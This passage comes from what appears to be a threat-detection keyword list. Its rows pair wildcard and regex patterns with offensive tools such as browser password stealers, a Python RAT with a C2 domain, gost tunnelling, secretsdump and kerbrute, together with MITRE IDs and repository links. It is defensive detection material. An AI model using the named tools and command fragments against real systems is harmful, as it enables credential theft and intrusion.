Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*google-chrome/cookies.txt*",".{0,1000}google\-chrome\/cookies\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*google-chrome/credit_cards.txt*",".{0,1000}google\-chrome\/credit_cards\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from 
chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*google-chrome/history.txt*",".{0,1000}google\-chrome\/history\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*google-chrome/login_data.txt*",".{0,1000}google\-chrome\/login_data\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*google-chrome\cookies.txt*",".{0,1000}google\-chrome\\cookies\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*google-chrome\credit_cards.txt*",".{0,1000}google\-chrome\\credit_cards\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports 
chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*google-chrome\history.txt*",".{0,1000}google\-chrome\\history\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*google-chrome\login_data.txt*",".{0,1000}google\-chrome\\login_data\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*googlechromeauto.serveirc.com*",".{0,1000}googlechromeauto\.serveirc\.com.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","1","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*GoogleChromeAutoLaunch_9921366102WEAD21312ESAD31312*",".{0,1000}GoogleChromeAutoLaunch_9921366102WEAD21312ESAD31312.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all 
antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","registry value","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*google-get-pdf-metadata *",".{0,1000}google\-get\-pdf\-metadata\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*google-get-rootdomains *",".{0,1000}google\-get\-rootdomains\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*goPassGen-master*",".{0,1000}goPassGen\-master.{0,1000}","offensive_tool_keyword","goPassGen","Easily-guessable Password Generator for Password Spray Attack","T1110 - T1110.003","TA0006 ","N/A","N/A","Exploitation tools","https://github.com/bigb0sss/goPassGen","1","1","N/A","8","1","20","3","2020-06-04T23:13:44Z","2020-06-04T22:33:37Z" "*gopherus --exploit mysql*",".{0,1000}gopherus\s\-\-exploit\smysql.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*gophish*phish.go*",".{0,1000}gophish.{0,1000}phish\.go.{0,1000}","offensive_tool_keyword","gophish","Gophish is an 
open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/gophish/gophish","1","1","N/A","N/A","10","10656","1973","2024-04-15T08:29:57Z","2013-11-18T23:26:43Z" "*gophish.go*",".{0,1000}gophish\.go.{0,1000}","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","10656","1973","2024-04-15T08:29:57Z","2013-11-18T23:26:43Z" "*gophish/gophish*",".{0,1000}gophish\/gophish.{0,1000}","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/gophish/gophish","1","1","N/A","N/A","10","10656","1973","2024-04-15T08:29:57Z","2013-11-18T23:26:43Z" "*gophish-send-mail.py*",".{0,1000}gophish\-send\-mail\.py.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2434","474","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*GoRelayServer.dll*",".{0,1000}GoRelayServer\.dll.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","495","78","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" "*gorsair -t *",".{0,1000}gorsair\s\-t\s.{0,1000}","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/Ullaakut/Gorsair","1","0","N/A","N/A","9","837","74","2023-12-19T18:44:32Z","2018-08-02T16:49:14Z" "*go-secdump -*",".{0,1000}go\-secdump\s\-.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","10","3","279","31","2024-03-17T14:21:34Z","2023-02-23T17:02:50Z" "*go-secdump.exe*",".{0,1000}go\-secdump\.exe.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","3","279","31","2024-03-17T14:21:34Z","2023-02-23T17:02:50Z" "*go-secdump-main*",".{0,1000}go\-secdump\-main.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","3","279","31","2024-03-17T14:21:34Z","2023-02-23T17:02:50Z" "*gosecretsdump -ntds *-system *",".{0,1000}gosecretsdump\s\-ntds\s.{0,1000}\-system\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*gosecretsdump v* (@C__Sto*",".{0,1000}gosecretsdump\sv.{0,1000}\s\(\@C__Sto.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*gosecretsdump/cmd*",".{0,1000}gosecretsdump\/cmd.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*gosecretsdump_win*.exe*",".{0,1000}gosecretsdump_win.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*gosecure/pyrdp*",".{0,1000}gosecure\/pyrdp.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*GoSecure/pyrdp*",".{0,1000}GoSecure\/pyrdp.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" 
"*go-shellcode.py*",".{0,1000}go\-shellcode\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" "*goShellCodeByPassVT*",".{0,1000}goShellCodeByPassVT.{0,1000}","offensive_tool_keyword","cobaltstrike","generate shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/fcre1938/goShellCodeByPassVT","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*goshs -b * --ssl --self-signed -p * -d /workspace*",".{0,1000}goshs\s\-b\s.{0,1000}\s\-\-ssl\s\-\-self\-signed\s\-p\s.{0,1000}\s\-d\s\/workspace.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*gost -L=:* -F=*:*",".{0,1000}gost\s\-L\=\:.{0,1000}\s\-F\=.{0,1000}\:.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","15142","2402","2024-04-19T11:42:09Z","2015-03-20T09:45:08Z" "*gost -L=admin:*@localhost:*",".{0,1000}gost\s\-L\=admin\:.{0,1000}\@localhost\:.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. 
they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","15142","2402","2024-04-19T11:42:09Z","2015-03-20T09:45:08Z" "*gost -L=forward+ssh://:*",".{0,1000}gost\s\-L\=forward\+ssh\:\/\/\:.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","15142","2402","2024-04-19T11:42:09Z","2015-03-20T09:45:08Z" "*gost -L=rtcp://*",".{0,1000}gost\s\-L\=rtcp\:\/\/.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","15142","2402","2024-04-19T11:42:09Z","2015-03-20T09:45:08Z" "*gost -L=rudp://*",".{0,1000}gost\s\-L\=rudp\:\/\/.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. 
they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","15142","2402","2024-04-19T11:42:09Z","2015-03-20T09:45:08Z" "*gost -L=ssh://:",".{0,1000}gost\s\-L\=ssh\:\/\/\:","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","15142","2402","2024-04-19T11:42:09Z","2015-03-20T09:45:08Z" "*gost -L=ssu://*",".{0,1000}gost\s\-L\=ssu\:\/\/.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","15142","2402","2024-04-19T11:42:09Z","2015-03-20T09:45:08Z" "*gost -L=udp://*",".{0,1000}gost\s\-L\=udp\:\/\/.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. 
they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","15142","2402","2024-04-19T11:42:09Z","2015-03-20T09:45:08Z" "*Got encrypted TGT for * but couldn't convert to hash*",".{0,1000}Got\sencrypted\sTGT\sfor\s.{0,1000}\sbut\scouldn\'t\sconvert\sto\shash.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*Got expected RPC_S_SERVER_UNAVAILABLE exception. Attack worked*",".{0,1000}Got\sexpected\sRPC_S_SERVER_UNAVAILABLE\sexception\.\sAttack\sworked.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*Got lsass.exe PID: *",".{0,1000}Got\slsass\.exe\sPID\:\s.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*gotato -m http*",".{0,1000}gotato\s\-m\shttp.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. 
Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*gotato -m pipe*",".{0,1000}gotato\s\-m\spipe.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*gotato* -n mal*",".{0,1000}gotato.{0,1000}\s\-n\smal.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*gotato* -p 4644*",".{0,1000}gotato.{0,1000}\s\-p\s4644.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*Gotato-main.*",".{0,1000}Gotato\-main\..{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. 
Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*govolution/avet*",".{0,1000}govolution\/avet.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*goWMIExec -target ",".{0,1000}goWMIExec\s\-target\s","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*goWMIExec/pkg*",".{0,1000}goWMIExec\/pkg.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","1","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*goZulipC2.go*",".{0,1000}goZulipC2\.go.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*goZulipC2-main*",".{0,1000}goZulipC2\-main.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - 
T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*gpg2john.*",".{0,1000}gpg2john\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*gpoddity.py*",".{0,1000}gpoddity\.py.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","1","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*gpoddity_smbserver.py*",".{0,1000}gpoddity_smbserver\.py.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","1","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*GPOddity-master*",".{0,1000}GPOddity\-master.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","1","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*GPO-RemoteAccess.txt*",".{0,1000}GPO\-RemoteAccess\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" 
"*gpp_autologin.py*",".{0,1000}gpp_autologin\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*gpp_password.py*",".{0,1000}gpp_password\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*GPP_Passwords.txt*",".{0,1000}GPP_Passwords\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*gppassword.py*",".{0,1000}gppassword\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*gpp-decrypt *",".{0,1000}gpp\-decrypt\s.{0,1000}","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*gpp-decrypt.py -f groups.xml*",".{0,1000}gpp\-decrypt\.py\s\-f\sgroups\.xml.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of 
